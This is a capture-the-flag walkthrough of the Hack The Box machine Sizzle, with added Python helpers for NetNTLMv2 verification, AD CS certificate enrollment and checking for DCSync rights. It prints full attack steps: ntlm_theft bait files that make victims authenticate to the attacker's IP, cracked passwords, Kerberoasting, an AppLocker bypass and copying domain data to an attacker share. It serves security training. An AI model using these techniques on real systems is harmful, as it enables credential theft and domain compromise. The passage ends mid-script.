Port scanning

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 11:52 CST
Nmap scan report for 10.10.10.103
Host is up (0.16s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49667/tcp open unknown
49670/tcp open unknown
49676/tcp open unknown
49692/tcp open unknown
49693/tcp open unknown
49695/tcp open unknown
49698/tcp open unknown
49713/tcp open unknown
49728/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 27.73 seconds
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo nmap -sT -sC -sV -O -p21,53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389 10.10.10.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-21 11:56 CST
Nmap scan report for 10.10.10.103
Host is up (0.075s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp filtered kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-09-21T03:47:27+00:00; -10m48s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -10m47s, deviation: 1s, median: -10m48s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-21T03:46:15
|_ start_date: 2024-09-21T03:38:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.29 seconds

Enum

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ dig any htb.local @10.10.10.103

; <<>> DiG 9.20.1-1-Debian <<>> any htb.local @10.10.10.103
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2718
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 9c09357f9974279c (echoed)
;; QUESTION SECTION:
;htb.local. IN ANY

;; ANSWER SECTION:
htb.local. 600 IN A 10.10.10.103
htb.local. 3600 IN NS sizzle.htb.local.
htb.local. 3600 IN SOA sizzle.htb.local. hostmaster.htb.local. 193 900 600 86400 3600
htb.local. 600 IN AAAA dead:beef::ad75:a077:89c9:f15d

;; ADDITIONAL SECTION:
sizzle.htb.local. 3600 IN A 10.10.10.103

;; Query time: 71 msec
;; SERVER: 10.10.10.103#53(10.10.10.103) (TCP)
;; WHEN: Sat Sep 21 12:02:33 CST 2024
;; MSG SIZE rcvd: 178

Add htb.local and sizzle.htb.local to /etc/hosts. (hostmaster.htb.local in the SOA record is the zone contact mailbox, hostmaster@htb.local, not a host name.)

FTP allows anonymous login, but the directory is empty.

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ smbmap -H 10.10.10.103 -u guest
<SNIP>
[+] IP: 10.10.10.103:445 Name: htb.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share

Department Shares is readable and looks like a per-department share. It contains a Users directory, so save the user names from it first; there is nothing else of interest. The web site on port 80 is just a GIF of grilling meat, and directory enumeration turned up nothing.

So back to the SMB share. Following the box's hint, check whether any directory under Department Shares is writable by the anonymous user; first mount the whole share locally.

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo mount -t cifs "//10.10.10.103/Department Shares" /mnt/share
[sudo] password for mikannse:
Password for root@//10.10.10.103/Department Shares:
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ ls /mnt/share
Accounting CEO_protected HR Infrastructure Marketing Security ZZ_ARCHIVE
Audit Devops IT Legal 'R&D' Tax
Banking Finance Infosec 'M&A' Sales Users

A short bash script probes every directory for write access:

#!/bin/bash
# Probe every directory under the mounted share for write access.
# -print0 / read -d '' keeps directory names with spaces or '&' intact
# (a plain for-loop over $(find ...) would split them on whitespace).
find /mnt/share -type d -print0 | while IFS= read -r -d '' d; do
    # creating a file succeeds only where the share ACL grants us write
    if touch "$d/x" 2>/dev/null; then
        echo "$d is writable"
        rm -f "$d/x"   # remove the probe file so nothing is left behind on the share
    fi
done
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ sudo ./scan.sh
/mnt/share/Users/Public is writable
/mnt/share/ZZ_ARCHIVE is writable

Getting a shell

Use ntlm_theft to generate bait files and upload them to the writable directories. An .scf file dropped in a share is enough: when a user browses the folder, Explorer fetches the icon from the UNC path in its IconFile entry and authenticates to our SMB server with that user's NTLM credentials (-s is the attacker's IP that the files point at).

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft]
└─$ python ntlm_theft.py -g all -s 10.10.14.15 -f hacker
┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft/hacker]
└─$ sudo cp ./hacker.scf /mnt/share/Users/Public/
[sudo] password for mikannse:

┌──(mikannse㉿kali)-[~/tools/domain/ntlm_theft/hacker]
└─$ sudo cp ./hacker.scf /mnt/share/ZZ_ARCHIVE
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ smbserver.py share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.103,51966)
[*] AUTHENTICATE_MESSAGE (HTB\amanda,SIZZLE)
[*] User SIZZLE\amanda authenticated successfully
[*] amanda::HTB:aaaaaaaaaaaaaaaa:b386a4ad45aabe55eac3ab637bc070c1:010100000000000080d90e3f010cdb01ea01259ac0aef0be00000000010010005a004a004d007600560050006a006c00030010005a004a004d007600560050006a006c00020010006a005200630077007a006e0074007900040010006a005200630077007a006e00740079000700080080d90e3f010cdb010600040002000000080030003000000000000000010000000020000013a18ef53140e405b57b69236feed65c46d3459d71ac3d0cb4bc9f5bc6f403840a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003500000000000000000000000000
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
1g 0:00:00:04 DONE (2024-09-21 16:36) 0.2173g/s 2482Kp/s 2482Kc/s 2482KC/s Ashia12..Arief&Siti
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
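The line smbserver.py printed is already in hashcat's NetNTLMv2 (-m 5600) layout: user::domain:server-challenge:NTProofStr:blob. As an added example (my code, not part of the original writeup), the script below recomputes NTProofStr from the cracked password, which confirms john's result independently and shows exactly which bytes the crack is keyed on, and decodes the AV pairs inside the blob; the target name tells you which service the victim's client thought it was talking to. It carries its own MD4, because hashlib on OpenSSL 3 usually refuses "md4" unless the legacy provider is loaded. The only input is the hash line captured above.

```python
import hmac
import struct
from datetime import datetime, timedelta, timezone
from hashlib import md5

MASK = 0xFFFFFFFF

# Hash line exactly as smbserver.py printed it above (hashcat -m 5600 layout).
CAPTURED_HASH = "amanda::HTB:aaaaaaaaaaaaaaaa:b386a4ad45aabe55eac3ab637bc070c1:010100000000000080d90e3f010cdb01ea01259ac0aef0be00000000010010005a004a004d007600560050006a006c00030010005a004a004d007600560050006a006c00020010006a005200630077007a006e0074007900040010006a005200630077007a006e00740079000700080080d90e3f010cdb010600040002000000080030003000000000000000010000000020000013a18ef53140e405b57b69236feed65c46d3459d71ac3d0cb4bc9f5bc6f403840a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0031003500000000000000000000000000"


def md4(data):
    """Pure-Python MD4 (RFC 1320): three rounds of 16 steps over 64-byte blocks."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"                      # pad: 0x80, zeros, 64-bit LE bit length
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (h, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, order, shifts, k in rounds:
            for i, j in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[j] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c                  # rotate registers for the next step
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password):
    """NTOWFv1: MD4 of the UTF-16LE password (the value secretsdump dumps later)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password, user, domain):
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), md5).digest()


def parse_netntlmv2(line):
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def verify_netntlmv2(line, password):
    """NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob); True if it matches."""
    h = parse_netntlmv2(line)
    key = ntlmv2_hash(password, h["user"], h["domain"])
    proof = hmac.new(key, h["challenge"] + h["blob"], md5).digest()
    return hmac.compare_digest(proof, h["proof"])


AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}


def parse_av_pairs(blob):
    """Decode the AV_PAIR list after the 28-byte NTLMv2_CLIENT_CHALLENGE header
    (type/hi-type/reserved 8, timestamp 8, client challenge 8, reserved 4)."""
    out, pos = {}, 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                                   # MsvAvEOL
            break
        val = blob[pos:pos + av_len]
        pos += av_len
        if av_id in (1, 2, 3, 4, 5, 9):                  # string-valued pairs are UTF-16LE
            val = val.decode("utf-16le")
        out[AV_NAMES.get(av_id, av_id)] = val
    return out


def filetime_to_datetime(raw):
    """8-byte little-endian FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    ticks = int.from_bytes(raw, "little")
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


if __name__ == "__main__":
    print("password verifies:", verify_netntlmv2(CAPTURED_HASH, "Ashare1972"))
    for name, val in parse_av_pairs(parse_netntlmv2(CAPTURED_HASH)["blob"]).items():
        if name == "Timestamp":
            val = filetime_to_datetime(val)
        print(f"{name:<16} {val if isinstance(val, (str, datetime)) else val.hex()}")
```

The TargetName pair (cifs/10.10.14.15) is the SPN the client built from our IP, and the all-zero ChannelBindings pair is what makes this hash relayable as well as crackable; when the target instead enforces SMB signing, as the nmap host script above reports for Sizzle itself, cracking is the only option.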

That gives amanda:Ashare1972, but it cannot be used to log in over WinRM; the attempt returns:

Error: An error of type WinRM::WinRMHTTPTransportError happened, message is Unable to parse authorization header. Headers: {"Server"=>"Microsoft-HTTPAPI/2.0", "Date"=>"Sat, 21 Sep 2024 08:28:03 GMT", "Connection"=>"close", "Content-Length"=>"0"}                                                          
Body: (401).

Error: Exiting with code 1

The server rejects the password-based (NTLM) Authorization header outright, which suggests the WinRM listener does not accept password authentication at all and expects a client certificate instead; that fits with the certificate enrollment found next.

Back to the web: a directory scan against the HTTPS site with an IIS wordlist:

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ gobuster dir -u https://10.10.10.103/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.10.103/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/IIS.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client/ (Status: 403) [Size: 1233]
/certsrv/ (Status: 401) [Size: 1293]
/certenroll/ (Status: 403) [Size: 1233]
/certsrv/mscep/mscep.dll (Status: 401) [Size: 1293]
/certsrv/mscep_admin (Status: 401) [Size: 1293]
/images/ (Status: 403) [Size: 1233]
Progress: 102 / 212 (48.11%)[ERROR] parse "https://10.10.10.103/%NETHOOD%/": invalid URL escape "%NE"
/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
/~/<script>alert('XSS')</script>.aspx (Status: 400) [Size: 3420]
Progress: 211 / 212 (99.53%)
===============================================================
Finished
===============================================================

https://10.10.10.103/certsrv accepts amanda's credentials. certsrv is the AD CS web enrollment page, which lets a domain user request certificates from the CA (the CertEnroll share seen in smbmap is the same CA's published certificates and CRLs).

First generate a private key and a certificate signing request locally:

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ openssl genrsa -des3 -out amanda.key 2048
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ openssl req -new -key amanda.key -out amanda.csr
Enter pass phrase for amanda.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

On the page click "Request a certificate", then "advanced certificate request", paste the contents of the .csr (the Base64 PEM block) into the request box, submit, and download the issued certificate in Base64 encoding (certnew.cer).

With the private key and the certificate, SSL enabled (-S) and the key's pass phrase typed in, the login succeeds. The DES3-encrypted key is also why "Enter PEM pass phrase:" keeps appearing in the session output further down; generating the key without -des3 avoids those prompts.
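The same enrollment can be scripted so it is repeatable for the next user (the writeup does it again for mrlky below). This is an added example, my code rather than the writeup's: it generates an unencrypted key and CSR with openssl non-interactively, submits the CSR to certfnsh.asp (the endpoint the "advanced certificate request" form posts to) over NTLM-authenticated HTTP, and downloads the issued certificate in Base64. Assumptions: requests and requests_ntlm are installed, the CA has a "User" template enabled for web enrollment (the writeup does not say which template it used, so the name is a guess), and the CA issues immediately rather than leaving the request pending.

```python
import re
import subprocess
import sys
from pathlib import Path


def make_key_and_csr(name, workdir):
    """Unencrypted RSA key + CSR via openssl with no prompts (no -des3, subject given)."""
    key, csr = Path(workdir) / f"{name}.key", Path(workdir) / f"{name}.csr"
    subprocess.run(["openssl", "genrsa", "-out", str(key), "2048"],
                   check=True, capture_output=True)
    subprocess.run(["openssl", "req", "-new", "-key", str(key), "-out", str(csr),
                    "-subj", f"/CN={name}"], check=True, capture_output=True)
    return key, csr


def build_enroll_form(csr_pem, template):
    """Form fields certfnsh.asp expects for a saved (pasted-CSR) request."""
    return {
        "Mode": "newreq",
        "CertRequest": csr_pem,
        "CertAttrib": f"CertificateTemplate:{template}",   # template name is an assumption
        "FriendlyType": "Saved-Request Certificate",
        "TargetStoreFlags": "0",
        "SaveCert": "yes",
    }


def find_request_id(html):
    """An issued request's page links to certnew.cer?ReqID=<n>&Enc=b64; None if pending/denied."""
    m = re.search(r"certnew\.cer\?ReqID=(\d+)", html)
    return int(m.group(1)) if m else None


def enroll(base_url, domain, user, password, csr_pem, template="User"):
    """Submit the CSR over NTLM-authenticated HTTP and return the issued certificate (PEM)."""
    import requests                      # third-party: pip install requests requests_ntlm
    import urllib3
    from requests_ntlm import HttpNtlmAuth
    urllib3.disable_warnings()           # the CA's web certificate is expired (see the nmap output)
    s = requests.Session()
    s.auth = HttpNtlmAuth(f"{domain}\\{user}", password)
    s.verify = False
    r = s.post(f"{base_url}/certsrv/certfnsh.asp", data=build_enroll_form(csr_pem, template))
    r.raise_for_status()
    req_id = find_request_id(r.text)
    if req_id is None:
        raise RuntimeError("no certificate issued (pending or denied); inspect the response HTML")
    r = s.get(f"{base_url}/certsrv/certnew.cer", params={"ReqID": req_id, "Enc": "b64"})
    r.raise_for_status()
    return r.text


if __name__ == "__main__":
    # usage: python enroll.py https://10.10.10.103 HTB amanda 'Ashare1972'
    base_url, domain, user, password = sys.argv[1:5]
    key, csr = make_key_and_csr(user, ".")
    cert = Path(f"{user}.cer")
    cert.write_text(enroll(base_url, domain, user, password, csr.read_text()))
    host = base_url.split("//", 1)[1]
    print(f"evil-winrm -i {host} -u {user} -p '{password}' -c {cert} -k {key} -S")
```

Because the key is unencrypted, the evil-winrm command it prints at the end connects without any pass phrase prompt; protect the .key file accordingly, since together with the certificate it is a reusable credential for that account until the certificate expires or is revoked.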

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ evil-winrm -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c ./certnew.cer -k ./amanda.key -S

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\amanda\Documents>
*Evil-WinRM* PS C:\Users\amanda\desktop> netstat -ap tcp

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:21 sizzle:0 LISTENING
TCP 0.0.0.0:80 sizzle:0 LISTENING
TCP 0.0.0.0:88 sizzle:0 LISTENING
TCP 0.0.0.0:135 sizzle:0 LISTENING
<SNIP>

Kerberoasting

netstat shows 88/Kerberos listening locally even though nmap reported it filtered, so Kerberoasting is on the table. Rubeus can do it, but running it was blocked, presumably by AppLocker.

Trying the locations from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md:

C:\Windows\System32\spool\drivers\color allows execution! AppLocker's default rules allow everything under %WINDIR%, and this directory is one of the few there that standard users can write to, so a binary copied into it runs.

*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> .\rb.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
<SNIP>
[*] Total kerberoastable users : 1


[*] SamAccountName : mrlky
[*] DistinguishedName : CN=mrlky,CN=Users,DC=HTB,DC=LOCAL
[*] ServicePrincipalName : http/sizzle
[*] PwdLastSet : 7/10/2018 2:08:09 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*mrlky$HTB.LOCAL$http/sizzle@HTB.LOCAL*$9000D99EB81039155964C86C7A92
B454$468C141F8792AC6CF71711CA20033988A1C3BC68F17F0C464FE1060D62CD60EC40ACD365C8E
498CF040FBD247229ADEA6942870BB2FE83C28C6785E8D38EDE86969F7A84325A03DD4636D0C9BDC
8B6E4ADE1DEDDAA7B94A142FC5CDF79BEFD3A7CCD9855E3107311AFB85ED388BDE5FE823DC30A179
<SNIP>

Copy the hash out and strip the spaces and line breaks that the console wrapping introduced:

┌──(mikannse㉿kali)-[~/tools/ByPass]
└─$ tr -d ' \r\n' < hash > hash1
┌──(mikannse㉿kali)-[~/tools/ByPass]
└─$ hashcat -m 13100 -a 0 hash1 /usr/share/wordlists/rockyou.txt

Result: mrlky:Football#7

Repeat the earlier steps to request a certificate for mrlky. The certsrv page has no logout button, so I cleared all cookies and logged in again.

DCSync

Run SharpHound to collect the domain:

*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> .\sp.exe --CollectionMethods All
2024-09-21T07:54:03.0827928-04:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-09-21T07:54:03.1921624-04:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-21T07:54:03.2077875-04:00|INFORMATION|Initializing SharpHound at 7:54 AM on 9/21/2024
2024-09-21T07:54:03.3171661-04:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for HTB.LOCAL : sizzle.HTB.LOCAL
2024-09-21T07:54:03.3327929-04:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-09-21T07:54:03.4421660-04:00|INFORMATION|Beginning LDAP search for HTB.LOCAL
2024-09-21T07:54:03.4734300-04:00|INFORMATION|Producer has finished, closing LDAP channel
2024-09-21T07:54:03.4734300-04:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-09-21T07:54:33.7391237-04:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 34 MB RAM
Enter PEM pass phrase:
2024-09-21T07:55:00.5360312-04:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-09-21T07:55:00.5516601-04:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-09-21T07:55:00.6454104-04:00|INFORMATION|Status: 94 objects finished (+94 1.649123)/s -- Using 42 MB RAM
2024-09-21T07:55:00.6454104-04:00|INFORMATION|Enumeration finished in 00:00:57.2129807
2024-09-21T07:55:00.7235314-04:00|INFORMATION|Saving cache with stats: 54 ID to type mappings.
53 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-09-21T07:55:00.7391572-04:00|INFORMATION|SharpHound Enumeration Completed at 7:55 AM on 9/21/2024! Happy Graphing!
Enter PEM pass phrase:

Bring the archive back over SMB:

┌──(mikannse㉿kali)-[~/HTB/sizzle]
└─$ smbserver.py share . -smb2support -username kali -password kali
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> net use \\10.10.14.15\share /u:kali kali
Enter PEM pass phrase:
The command completed successfully.

*Evil-WinRM* PS C:\Windows\System32\spool\drivers\color> copy 20240921075447_BloodHound.zip \\10.10.14.15\share

After importing into BloodHound and looking at the mrlky user, one of the Outbound Object Control edges is DCSync: mrlky holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object, which let an account act like a domain controller and pull directory replication data, password hashes included.

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/dcsync
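BloodHound draws the DCSync edge when a principal holds both replication extended rights on the domain head (GenericAll, or WriteDacl/WriteOwner to grant them, reach the same place). To check that from the directory rather than from the graph, here is an added example (mine, not the writeup's) that walks an SDDL string of the domain object's security descriptor and lists every trustee that can DCSync. Assumptions: the SDDL was exported from the DC, for instance with (Get-Acl 'AD:\DC=htb,DC=local').Sddl from the ActiveDirectory module; the sample descriptor and its SIDs are constructed for illustration and only the shape matches a real domain head.

```python
import re

# Extended-right GUIDs that together make up BloodHound's "DCSync" edge.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# SDDL ACE: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# Rights that matter for this check, as SDDL two-letter codes and ACCESS_MASK bits.
RIGHT_BITS = {"CR": 0x100, "WD": 0x40000, "WO": 0x80000, "GA": 0x10000000}


def parse_rights(field):
    """SDDL rights are either a hex ACCESS_MASK or a run of two-letter codes."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {code for code, bit in RIGHT_BITS.items() if mask & bit == bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def dcsync_capable(sddl):
    """Map trustee -> reason for every allow ACE that yields DCSync on this object."""
    get_changes, get_changes_all, found = set(), set(), {}
    for ace_type, _flags, rights, obj_guid, _inherit, trustee in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA"):          # deny ACEs (D/OD) are not evaluated here
            continue
        r = parse_rights(rights)
        if "GA" in r:
            found[trustee] = "GenericAll"
        elif "WD" in r or "WO" in r:
            found[trustee] = "WriteDacl/WriteOwner (can grant itself the replication rights)"
        if "CR" in r:
            guid = obj_guid.lower()
            if guid == "":                       # control access with no GUID = every extended right
                found[trustee] = "all extended rights"
            elif guid == DS_REPLICATION_GET_CHANGES:
                get_changes.add(trustee)
            elif guid == DS_REPLICATION_GET_CHANGES_ALL:
                get_changes_all.add(trustee)
    # Only the pair of rights is enough on its own; one of the two is not.
    for trustee in get_changes & get_changes_all:
        found.setdefault(trustee, "DS-Replication-Get-Changes + DS-Replication-Get-Changes-All")
    return found


# Constructed sample descriptor with hypothetical SIDs.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"                                            # Domain Admins
    "(A;;GA;;;SY)"                                                                    # SYSTEM
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1106)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1106)"     # both: DCSync
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1107)"     # one only: not enough
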